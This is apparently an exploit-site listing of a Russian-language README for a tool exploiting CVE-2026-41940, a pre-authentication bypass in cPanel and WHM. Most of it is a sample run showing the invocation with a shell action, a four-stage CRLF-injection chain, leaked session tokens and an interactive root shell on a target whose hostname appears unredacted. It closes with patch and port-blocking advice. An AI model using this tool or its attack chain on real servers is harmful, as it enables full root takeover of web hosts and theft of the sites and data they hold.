Sploitus

Exploit for CVE-2026-41940

kitploit · 2026-09-01

Exploit Code

MARKDOWN170 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-41940
# ⚠️ CVE-2026-41940 — Обход аутентификации cPanel и WHM

![ChatGPT Image May 1, 2026, 08_27_37 PM](https://assets.kitploit.com/production/public/readmes/42502/b9c5e211a0838220a2a23db9659bd5a53f62f0bdebd3db7347c8eebeaa16caaa.png)

* * *

![CVSS 9.8](https://img.shields.io/badge/CVSS-9.8-CRITICAL?style=for-the-badge&color=red) ![Critical](https://img.shields.io/badge/Severity-Critical-red?style=for-the-badge) ![Actively Exploited](https://img.shields.io/badge/Status-Actively%20Exploited-orange?style=for-the-badge)

### **Критический обход предварительной аутентификации в cPanel и WHM**

* * *

## 📌 Обзор

**CVE-2026-41940** — это **критическая уязвимость обхода аутентификации** , затрагивающая **cPanel и WHM** , а также **WP Squared**.

Неаутентифицированный удалённый злоумышленник может полностью обойти процедуру входа и получить **полный административный доступ (root/WHM)** к серверу.

Уязвимость **активно эксплуатировалась в дикой природе** до выпуска исправления.

* * *

## 🎯 Серьёзность

* * *

## 🛠️ Затронутые продукты

  * **cPanel и WHM** — все версии после 11.40 до выхода исправления
  * **WP Squared** — версии до **136.1.7**



> **~1,5 миллиона** экземпляров cPanel потенциально были подвержены уязвимости на момент раскрытия информации.

* * *

## 🔥 Воздействие

Успешная эксплуатация позволяет злоумышленникам:

  * Получить полный доступ WHM/root
  * Захватить все размещённые веб-сайты и учётные записи
  * Изменять конфигурации сервера
  * Похищать конфиденциальные данные
  * Внедрять постоянные бэкдоры



* * *

### ✅ Вот как выглядит УСПЕХ (как на скриншоте Eye Security, который вы показывали):

Если всё работает, вы должны увидеть нечто подобное:

root@kitploit:~
    
    
    ┌──(kali㉿kali)-[~]
    └─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
    [sudo] password for kali: 
    
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
      4-stage: preauth → CRLF inject → propagate → verify → post-exploit
      Author : Ashraf Zaryouh / @0xBlackash
    
      Configuration:
       Targets  : 1
       Threads  : 10
       Timeout  : 15s
       Action   : shell
    
    13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
    13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
    13:41:19 [INFO] Canonical: server.softsms.in
    13:41:19 [STEP] Stage 1/4 — Minting preauth session...
    13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
    13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
    13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
    13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
    13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
    13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
    13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
    13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
    13:41:24 [PWND]   Token    : /cpsess2634xxxx267
    13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
    13:41:24 [PWND]   Version  : 11.86.0.40
    13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
    13:41:24 [ API] Running post-exploit action: shell
    
    ════════════════════════════════════════════════════════════
      WHM Shell — server.xxxxxxx.xx
      Version: CVE-2026-41940 | Auth: CRLF bypass
      Type 'help' for commands, 'exit' to quit
    ════════════════════════════════════════════════════════════
    
    some-email@example.com ▶ id
    13:41:28 [ API] gethostname → HTTP 500
      uid=0(root) gid=0(root) groups=0(root)
    some-email@example.com ▶ exit
    Exiting shell.
    
    ══════════════════════════════════════════════════════════════════════
      CVE-2026-41940.py — CVE-2026-41940 Scan Complete
      Time: 13.9s  ·  Targets: 1
    ──────────────────────────────────────────────────────────────────────
    
      ⚡ 1 VULNERABLE TARGET(S)
    
      Target   : https://xx.xx.xx.xx:2087
      Version  : 11.86.0.40
      Token    : /cpsess263xxxx267
      API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
      Session  : :W43DhFApxxxD8Jdw...
      Evidence : {"version":"11.86.0.40"}
    
    ══════════════════════════════════════════════════════════════════════
    
    

* * *

## ✅ Исправленные версии

**Исправление выпущено 28 апреля 2026 года**

  * Обновите **cPanel и WHM** до последней сборки
  * Обновите **WP Squared** до версии **136.1.7** или новее



**Рекомендуются немедленные действия**

* * *

## 🛡️ Смягчение последствий и защита

  * **Немедленно** обновитесь до последней версии
  * Заблокируйте публичный доступ к портам `2082`, `2083`, `2086`, `2087`
  * Включите правила WAF (Cloudflare, ModSecurity и т. п.)
  * Используйте белые списки IP или VPN для управленческого доступа



* * *

## 📚 Ссылки

  * NVD — CVE-2026-41940
  * watchTowr Labs — технический разбор
  * Официальное уведомление безопасности cPanel
  * Каталог CISA KEV



* * *

* * *

**Сделано с ❤️ для сообщества специалистов по безопасности**

**Последнее обновление: май 2026 года**